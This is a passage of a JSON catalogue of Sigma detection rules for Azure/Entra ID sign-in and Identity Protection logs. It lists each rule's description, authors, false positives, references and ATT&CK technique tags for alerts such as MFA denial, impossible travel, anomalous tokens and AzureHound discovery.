'@dudders1', Tim Shelton", "creation_date": "2022-08-11", "falsepositive": [ "Increase of users in the environment" ], "filename": "azure_ad_auth_sucess_increase.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", "value": "Measurable Increase Of Successful Authentications" }, { "description": "Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.", "meta": { "author": "Janantha Marasinghe", "creation_date": "2022-11-27", "falsepositive": [ "Unknown" ], "filename": "azure_ad_azurehound_discovery.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://github.com/BloodHoundAD/AzureHound", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1087.004", "attack.t1526" ] }, "related": [ { "dest-uuid": "8f104855-e5b7-4077-b1f5-bc3103b41abe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35b781cc-1a08-4a5a-80af-42fd7c315c6b", "value": "Discovery Using AzureHound" }, { "description": "Monitor and alert for sign-ins where the device was non-compliant.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", "value": "Sign-ins from Non-Compliant Devices" }, { "description": "Detects risky authentication from a non AD registered device without MFA being required.", "meta": { "author": "Harjot Singh, '@cyb3rjy0t'", "creation_date": "2023-01-10", "falsepositive": [ "Unknown" ], "filename": "azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "572b12d4-9062-11ed-a1eb-0242ac120002", "value": "Suspicious SignIns From A Non Registered Device" }, { "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-06-01", "falsepositive": [ "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" ], "filename": "azure_app_ropc_authentication.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml" ], "tags": [ "attack.t1078", "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", "value": "Applications That Are Using ROPC Authentication Flow" }, { "description": "Alert on when legacy authentication has been used on an account", "meta": { "author": "Yochana Henderson, '@Yochana-H'", "creation_date": "2022-06-17", "falsepositive": [ "User has been put in acception group so they can use legacy authentication" ], "filename": "azure_legacy_authentication_protocols.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", "value": "Use of Legacy Authentication Protocols" }, { "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.\n", "meta": { "author": "AlertIQ", "creation_date": "2021-10-10", "falsepositive": [ "Unknown" ], "filename": "azure_user_login_blocked_by_conditional_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml" ], "tags": [ "attack.credential-access", "attack.initial-access", "attack.t1110", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", "value": "User Access Blocked by Azure Conditional Access" }, { "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", "meta": { "author": "AlertIQ", "creation_date": "2021-10-10", "falsepositive": [ "Unknown" ], "filename": "azure_mfa_interrupted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110", "attack.t1621" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "954a1639-f2d6-407d-aef3-4917622ca493", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", "value": "Multifactor Authentication Interrupted" }, { "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", "meta": { "author": "Yochana Henderson, '@Yochana-H'", "creation_date": "2022-06-01", "falsepositive": [ "Service Account misconfigured", "Misconfigured Systems", "Vulnerability Scanners" ], "filename": "azure_conditional_access_failure.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1110", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", "value": "Sign-in Failure Due to Conditional Access Requirements Not Met" }, { "description": "Detect failed authentications from countries you do not operate out of.", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-28", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", "value": "Failed Authentications From Countries You Do Not Operate Out Of" }, { "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_sign_ins_from_unknown_devices.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", "value": "Sign-ins by Unknown Devices" }, { "description": "Detects when sign-ins increased by 10% or greater.", "meta": { "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", "creation_date": "2022-08-11", "falsepositive": [ "Unlikely" ], "filename": "azure_ad_auth_failure_increase.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", "value": "Increased Failed Authentications Of Any Type" }, { "description": "Detects when there is a interruption in the authentication process.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "azure_unusual_authentication_interruption.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8366030e-7216-476b-9927-271d79f13cf3", "value": "Azure Unusual Authentication Interruption" }, { "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", "meta": { "author": "AlertIQ", "creation_date": "2021-10-10", "falsepositive": [ "Unknown" ], "filename": "azure_account_lockout.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_account_lockout.yml" ], "tags": [ "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", "value": "Account Lockout" }, { "description": "Detect failed attempts to sign in to disabled accounts.", "meta": { "author": "AlertIQ", "creation_date": "2021-10-10", "falsepositive": [ "Unknown" ], "filename": "azure_login_to_disabled_account.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", "value": "Login to Disabled Account" }, { "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-06-01", "falsepositive": [ "Applications that are input constrained will need to use device code flow and are valid authentications." ], "filename": "azure_app_device_code_authentication.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml" ], "tags": [ "attack.t1078", "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", "value": "Application Using Device Code Authentication Flow" }, { "description": "Detects when an account is disabled or blocked for sign in but tried to log in", "meta": { "author": "Yochana Henderson, '@Yochana-H'", "creation_date": "2022-06-17", "falsepositive": [ "Account disabled or blocked in error", "Automation account has been blocked or disabled" ], "filename": "azure_blocked_account_attempt.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", "value": "Account Disabled or Blocked for Sign in Attempts" }, { "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", "meta": { "author": "AlertIQ", "creation_date": "2022-03-24", "falsepositive": [ "Users actually login but miss-click into the Deny button when MFA prompt." ], "filename": "azure_mfa_denies.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_mfa_denies.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110", "attack.t1621" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "954a1639-f2d6-407d-aef3-4917622ca493", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", "value": "Multifactor Authentication Denied" }, { "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-06-30", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", "value": "Users Authenticating To Other Azure AD Tenants" }, { "description": "Monitor and alert for device registration or join events where MFA was not performed.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_device_registration_or_join_without_mfa.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", "value": "Device Registration or Join Without MFA" }, { "description": "Detect when authentications to important application(s) only required single-factor authentication", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-28", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f272fb46-25f2-422c-b667-45837994980f", "value": "Authentications To Important Apps Using Single Factor Authentication" }, { "description": "Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_anonymous_ip_activity.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "be4d9c86-d702-4030-b52e-c7859110e5e8", "value": "Activity From Anonymous IP Address" }, { "description": "Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_token_issuer_anomaly.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly", "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml" ], "tags": [ "attack.t1606", "attack.credential-access" ] }, "related": [ { "dest-uuid": "94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3393cba-31f0-4207-831e-aef90ab17a8c", "value": "SAML Token Issuer Anomaly" }, { "description": "Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "Connecting to a VPN, performing activity and then dropping and performing additional activity." ], "filename": "azure_identity_protection_impossible_travel.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2572bf9-e20a-4594-b528-40bde666525a", "value": "Impossible Travel" }, { "description": "Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-07", "falsepositive": [ "This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated." ], "filename": "azure_identity_protection_prt_access.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml" ], "tags": [ "attack.t1528", "attack.credential-access" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a84fc3b1-c9ce-4125-8e74-bdcdb24021f1", "value": "Primary Refresh Token Access Attempt" }, { "description": "Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-07", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_malicious_ip_address_suspicious.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml" ], "tags": [ "attack.t1090", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36440e1c-5c22-467a-889b-593e66498472", "value": "Malicious IP Address Sign-In Suspicious" }, { "description": "Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.", "meta": { "author": "Mark Morowczynski '@markmorow'", "creation_date": "2023-08-07", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_anomalous_token.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml" ], "tags": [ "attack.t1528", "attack.credential-access" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6555754e-5e7f-4a67-ad1c-4041c413a007", "value": "Anomalous Token" }, { "description": "Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_new_coutry_region.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "adf9f4d2-559e-4f5c-95be-c28dff0b1476", "value": "New Country" }, { "description": "Indicates sign-in from a malicious IP address based on high failure rates.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-07", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_malicious_ip_address.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml" ], "tags": [ "attack.t1090", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd", "value": "Malicious IP Address Sign-In Failure Rate" }, { "description": "Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_anomalous_user.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml" ], "tags": [ "attack.t1098", "attack.persistence" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "258b6593-215d-4a26-a141-c8e31c1299a6", "value": "Anomalous User Activity" }, { "description": "Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions 